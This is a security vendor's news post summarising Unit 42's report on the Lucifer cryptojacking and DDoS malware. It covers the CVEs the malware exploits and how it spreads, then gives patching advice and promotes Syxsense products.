Lucifer Malware Targets Windows Systems

Lucifer Malware Targets Windows Systems

New Malware Exploits Critical Vulnerabilities

A new devilish malware is currently exploiting critical vulnerabilities on Windows devices.

Nicknamed Lucifer, the self-propagating malware is targeting Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks. This new variant initially attempts to infect devices by blasting them with attacks in the hopes of exploiting any number of unpatched vulnerabilities.

“Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,” stated researchers at Palo Alto Networks’ Unit 42 team. “Applying the updates and patches to the affected software are strongly advised.”

In a blog post, researchers said the latest variant of Lucifer was discovered on May 29 while investigating the exploit of CVE-2019-9081, a bug in the Laravel Framework that can be exploited to achieve remote code execution attacks. There are in fact many other vulnerabilities being exploited such as in Rejetto HTTP File Server (CVE-2014-6287), Microsoft Windows (CVE-2017-0144, CVE-2017-0145, CVE-2017-8464), Apache Struts (CVE-2017-9791), Oracle Weblogic (CVE-2017-10271), ThinkPHP RCE (CVE-2018-20062), and Laravel framework (CVE-2019-9081), among others.

How Lucifer Malware Infects Targets

After successfully exploiting the vulnerability through the use of credential-stuffing, the attacker then connects to the command-and-control (C2) server to execute arbitrary commands on the vulnerable device. These include TCP, UDP, or HTTP denial-of-service attacks. The malware may also infect its targets through IPC, WMI, SMB, and FTP via brute-force as well as through MSSQL, RPC, and network sharing.

“The targets are Windows hosts on both internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers noted. If the SMB protocol is left open, Lucifer then executes several backdoors to establish persistence. These include EternalBlue, EternalRomance, and DoublePulsar exploits. Researchers say Lucifer can also attempt to evade detection or reverse engineering with anti-sandbox capability and enhanced checks for device drivers, DLLs, and virtual devices.

Researchers discovered two versions of the malware: one initiated on May 29 and the other that “wreaked havoc” on June 11. The developer of the malware refers to it as Satan DDoS, but since other malware families already use this name, the researchers at Palo Alto decided “Lucifer” was more fitting.

How to Detect and Avoid Malware

Although malware appears to be growing in sophistication, researchers recommend enterprises protecting themselves with simple security measures such as applying the necessary security updates and strengthening authentication methods.

Syxsense Manage and Syxsense Secure can easily resolve vulnerabilities across an entire environment, whether on-premise or remote. A combination of strict security standards and proper offline backups, paired with a secure systems management and security solution, will ensure that organizations are not affected by rising ransomware and other malware events.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.